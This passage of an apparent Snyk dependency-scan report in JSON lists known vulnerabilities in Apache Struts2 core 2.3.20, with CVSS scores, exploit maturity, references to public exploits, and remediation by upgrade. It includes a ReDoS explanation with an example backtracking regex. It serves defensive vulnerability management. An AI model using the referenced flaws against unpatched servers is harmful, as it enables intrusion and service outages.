}\r\n```\r\n\r\n3. 
Register the handler by overriding the one provided by the framework in your struts.xml\r\n```xml\r\n\r\n\r\n```\r\n\r\n## References\r\n- [LGTM Advisory](https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement)\r\n- [LGTM Vulnerability Details](https://lgtm.com/blog/apache_struts_CVE-2017-9805)\r\n- [Apache Struts Statement on Equifax Security Breach](https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax)\r\n- [Apache Security Bulletin](https://cwiki.apache.org/confluence/display/WW/S2-052)", + "epssDetails": { + "percentile": "0.99995", + "probability": "0.97541", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2017-9805" + ], + "CWE": [ + "CWE-20", + "CWE-502" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2017-09-06T17:28:23.339000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2017-09-05T17:28:23Z", + "exploitDetails": { + "sources": [ + "CISA", + "ExploitDB", + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Attacked", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2017-09-06T17:28:23Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:26.345481Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.34" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-31500", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + 
"credit": [ + "Yasser Zamani" + ], + "semver": { + "vulnerable": [ + "[2.3.7,2.3.33)", + "[2.5,2.5.12)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.33", + "2.5.12" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://lists.apache.org/thread.html/3795c4dd46d9ec75f4a6eb9eca11c11edd3e796c6c1fd7b17b5dc50d@%3Cannouncements.struts.apache.org%3E", + "title": "Apache Security Advisory" + }, + { + "url": "https://github.com/apache/struts/commit/086b63735527d4bb0c1dd0d86a7c0374b825ff2", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/0d6442bab5b44d93c4c2e63c5335f0a331333b9", + "title": "GitHub Commit" + }, + { + "url": "http://struts.apache.org/docs/s2-049.html", + "title": "Struts Security Bulletin" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:47:51.213194Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:03:16.872773Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:47:51.213194Z" + } + ], + "description": "## Overview\n[Apache Struts2](http://struts.apache.org/) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) attacks.\nWhen using a Spring AOP functionality 
to secure Struts actions it is possible to perform a DoS attack.\n\n\n## Details\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\r\n\r\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\r\n\r\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\r\n\r\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\r\n\r\nTwo common types of DoS vulnerabilities:\r\n\r\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\r\n\r\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](npm:ws:20171108)\n\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.33, 2.5.12 or higher.\n\n## References\n- [Struts Security Bulletin](http://struts.apache.org/docs/s2-049.html)\n- [Struts Announcements Mailing List](https://lists.apache.org/thread.html/3795c4dd46d9ec75f4a6eb9eca11c11edd3e796c6c1fd7b17b5dc50d@%3Cannouncements.struts.apache.org%3E)\n", + "epssDetails": { + "percentile": "0.91602", + "probability": "0.03467", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2017-9787" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2017-09-12T12:47:32.905000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2017-07-13T15:29:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2017-09-12T12:47:32.905000Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:47:51.213194Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.33" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-31501", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "Adam Cazzolla", + "Jonathan Bullock" + ], + "semver": { + "vulnerable": [ + "[2.3.7,2.3.34)", + "[2.5,2.5.13)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ 
+ "2.3.34", + "2.5.13" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://github.com/apache/struts/commit/3fddfb6eb562d597c935084e9e81d43ed6bcd02", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/418a20c0594f23764fe29ced400c1219239899a", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/744c1f409d983641af3e8e3b573c2f2d2c2c6d9", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/8a04e80f01350c90f053d71366d5e0c2186fded", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/9d47af6ffa355977b5acc713e6d1f25fac260a2", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/a05259ed69a5a48379aa91650e4cd1cb4bd6e5a", + "title": "GitHub Commit" + }, + { + "url": "http://struts.apache.org/docs/s2-050.html", + "title": "Struts Security Bulletin" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:47:48.540352Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:03:13.755151Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:47:48.540352Z" + } + ], + "description": "## Overview\n[Apache Struts2](http://struts.apache.org/) is a popular open-source framework for developing web 
applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) attacks. This is due to an incomplete fix for [CVE-2017-7672](https://snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTS-31499). If an application allows enter an URL in a form field and built-in URLValidator is used, it is possible to prepare a special URL which will be used to overload server process when performing validation of the URL.\n\n## Details\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\r\n\r\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\r\n\r\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\r\n\r\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\r\n\r\nTwo common types of DoS vulnerabilities:\r\n\r\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\r\n\r\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](npm:ws:20171108)\n\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.34, 2.5.13 or higher.\n\n## References\n- [Struts Security Bulletin](http://struts.apache.org/docs/s2-050.html)\n", + "epssDetails": { + "percentile": "0.90011", + "probability": "0.02403", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2017-9804" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2017-09-12T12:47:32.905000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2017-08-23T21:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2017-09-12T12:47:32.905000Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:47:48.540352Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.34" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-31502", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "Huijun Chen", + "Xiaolong Zhu" + ], + "semver": { + "vulnerable": [ + "[2.3.7,2.3.34)", + "[2.5,2.5.13)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.34", + "2.5.13" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + 
"malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "http://struts.apache.org/docs/s2-051.html", + "title": "Struts Security Bulletin" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:47:51.883631Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:13.751396Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:47:51.883631Z" + } + ], + "description": "## Overview\n[Apache Struts2](http://struts.apache.org/) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Denial of Service (ReDoS) attacks. The REST Plugin is using outdated XStream library which is vulnerable and allow perform a DoS attack using malicious request with specially crafted XML payload.\n\n## Details\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\r\n\r\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. 
Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\r\n\r\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\r\n\r\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\r\n\r\nTwo common types of DoS vulnerabilities:\r\n\r\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\r\n\r\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](npm:ws:20171108)\n\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.34, 2.5.13 or higher.\n\n## References\n- [Struts Security Bulletin](http://struts.apache.org/docs/s2-051.html)\n", + "epssDetails": { + "percentile": "0.99002", + "probability": "0.93195", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2017-9793" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2017-09-12T12:47:32.905000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2017-08-23T21:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2017-09-12T12:47:32.905000Z", + 
"severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:47:51.883631Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.34" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-32477", + "title": "Remote Code Execution", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C", + "credit": [ + "Man Yue Mo" + ], + "semver": { + "vulnerable": [ + "[2.3.0, 2.3.35)", + "[2.5.0, 2.5.17)" + ] + }, + "exploit": "High", + "fixedIn": [ + "2.3.35", + "2.5.17" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.3.0, 2.3.35)", + "[2.5.0, 2.5.17)" + ], + "functionId": { + "filePath": "com/opensymphony/xwork2/ActionChainResult.java", + "className": "ActionChainResult", + "functionName": "execute" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://exploit-db.com/exploits/45367", + "title": "Exploit DB" + }, + { + "url": "https://www.exploit-db.com/exploits/45367", + "title": "Exploit DB" + }, + { + "url": "https://github.com/apache/struts/commit/b3bad5ea44f3fd9edb2cb491192c5900f46d45d3", + "title": "GitHub Commit" + }, + { + "url": "https://lgtm.com/blog/apache_struts_CVE-2018-11776", + "title": "Lgtm Blog" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1620019", + "title": "RedHat Bugzilla Bug" + }, + { + "url": "https://cwiki.apache.org/confluence/display/WW/S2-057", + "title": "Struts2 Security Bulletin" + }, + { + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", + "title": "CISA - Known Exploited 
Vulnerabilities" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2018/CVE-2018-11776.yaml", + "title": "Nuclei Templates" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:21.641643Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:35.323655Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:21.641643Z" + } + ], + "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Remote Code Execution. When the namespace value is not set for a result defined in underlying xml configurations, and in same time, its upper action(s) configurations have no or wildcard namespace, an attacker may be able to conduct a remote code execution attack. 
They could also use the opportunity when using a url tag which does not have a value and action set and in same time, its upper action(s) configurations have no or wildcard namespace.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.35, 2.5.17 or higher.\n## References\n- [Exploit DB](https://exploit-db.com/exploits/45367)\n- [Exploit DB](https://www.exploit-db.com/exploits/45367)\n- [GitHub Commit](https://github.com/apache/struts/commit/b3bad5ea44f3fd9edb2cb491192c5900f46d45d3)\n- [Lgtm Blog](https://lgtm.com/blog/apache_struts_CVE-2018-11776)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1620019)\n- [Struts2 Security Bulletin](https://cwiki.apache.org/confluence/display/WW/S2-057)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2018/CVE-2018-11776.yaml)\n", + "epssDetails": { + "percentile": "0.99991", + "probability": "0.97527", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-11776" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2018-08-22T00:00:00Z", + "functions_new": [ + { + "version": [ + "[2.3.0, 2.3.35)", + "[2.5.0, 2.5.17)" + ], + "functionId": { + "className": "com.opensymphony.xwork2.ActionChainResult", + "functionName": "execute" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-08-17T00:00:00Z", + "exploitDetails": { + "sources": [ + "CISA", + "ExploitDB", + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Attacked", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2018-08-22T11:53:44Z", + 
"severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:26.324260Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.35" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-460223", + "title": "Regular Expression Denial of Service (ReDoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.3.20, 2.3.29)", + "[2.5,2.5.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.29", + "2.5.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://github.com/apache/struts/commit/a0fdca138feec2c2e94eb75ca1f8b76678b4d152", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/eccc31ebce5430f9e91b9684c63eaaf885e603f9", + "title": "GitHub Commit" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4465", + "title": "NVD" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:46:51.243501Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:37.316157Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "NVD", 
+ "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:51.243501Z" + } + ], + "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). The URLValidator class allows remote attackers to cause a denial of service via a null value for a URL field.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.\n\nThe Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.\n\nLet’s take the following regular expression as an example:\n```js\nregex = /A(B|C+)+D/\n```\n\nThis regular expression accomplishes the following:\n- `A` The string must start with the letter 'A'\n- `(B|C+)+` The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the `+` matches one or more times). 
The `+` at the end of this section states that we can look for one or more matches of this section.\n- `D` Finally, we ensure this section of the string ends with a 'D'\n\nThe expression would match inputs such as `ABBD`, `ABCCCCD`, `ABCBCCCD` and `ACCCCCD`\n\nIt most cases, it doesn't take very long for a regex engine to find a match:\n\n```bash\n$ time node -e '/A(B|C+)+D/.test(\"ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD\")'\n0.04s user 0.01s system 95% cpu 0.052 total\n\n$ time node -e '/A(B|C+)+D/.test(\"ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX\")'\n1.79s user 0.02s system 99% cpu 1.812 total\n```\n\nThe entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.\n\nMost Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as _catastrophic backtracking_.\n\nLet's look at how our expression runs into this problem, using a shorter string: \"ACCCX\". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:\n1. CCC\n2. CC+C\n3. C+CC\n4. C+C+C.\n\nThe engine has to try each of those combinations to see if any of them potentially match against the expression. 
When you combine that with the other steps the engine must take, we can use [RegEx 101 debugger](https://regex101.com/debugger) to see the engine has to take a total of 38 steps before it can determine the string doesn't match.\n\nFrom there, the number of steps the engine must use to validate a string just continues to grow.\n\n| String | Number of C's | Number of steps |\n| -------|-------------:| -----:|\n| ACCCX | 3 | 38\n| ACCCCX | 4 | 71\n| ACCCCCX | 5 | 136\n| ACCCCCCCCCCCCCCX | 14 | 65,553\n\n\nBy the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.\n\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.29, 2.5.1 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/a0fdca138feec2c2e94eb75ca1f8b76678b4d152)\n- [GitHub Commit](https://github.com/apache/struts/commit/eccc31ebce5430f9e91b9684c63eaaf885e603f9)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4465)\n", + "epssDetails": { + "percentile": "0.99401", + "probability": "0.95900", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-4465" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2019-08-23T13:23:19.812650Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-06-20T07:45:43Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": 
"struts2-core" + }, + "publicationTime": "2016-06-20T07:45:43Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:51.243501Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.29" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-5707101", + "title": "Allocation of Resources Without Limits or Throttling", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", + "credit": [ + "Matthew McClain" + ], + "semver": { + "vulnerable": [ + "[2.0.0,2.5.31)", + "[6.1.2,6.1.2.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.5.31", + "6.1.2.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 4.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://github.com/apache/struts/commit/2d6f1bc0a6f5ac575a56784ac6461816b67c4f21", + "title": "GitHub Commit" + }, + { + "url": "https://cwiki.apache.org/confluence/display/WW/S2-063", + "title": "Security Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:48:27.696682Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:06:22.161472Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "medium", + 
